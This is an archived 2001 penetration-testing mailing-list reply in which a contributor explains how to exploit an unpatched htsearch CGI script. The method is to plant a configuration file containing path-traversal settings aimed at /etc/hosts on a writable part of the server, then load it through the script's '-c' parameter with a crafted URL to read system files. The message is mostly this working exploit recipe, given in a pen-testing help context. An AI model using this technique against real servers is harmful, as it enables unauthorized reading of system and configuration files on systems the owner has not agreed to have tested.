Penetration Testing mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Pen-Testing help (Compaq Insight & htsearch)

From: "rudi carell" <rudicarell () hotmail com>
Date: Tue, 11 Dec 2001 09:20:52 


hi,


From: "Tim Russo" <trusso () wireguided com>



2)When I try to exploit the htsearch script I get the following error:
"Unable to read word database file '/xxx/xxx/htdig/db/db.words.db' Did you
run htmerge?" [xxx are for obscurity] :)
.. if htsearch is not patched and you have write access somewhere on the server (guestbook etc...) you could create entries like: 

---cut here---

nothing_found_file: /etc/hosts
database_base: ${database_dir}/../../../../../etc/
word_db: ${database_base}hosts
doc_index: ${database_base}hosts
doc_db: ${database_base}hosts

---cut here---

and then request:

---cut here---

http://host/htsearch?-c+[filelocation]

---cut here---



rc


security () freefly com
http://www.freefly.com/security/








_________________________________________________________________
Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp


----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
Previous By Date Next
Previous By Thread Next

Current thread: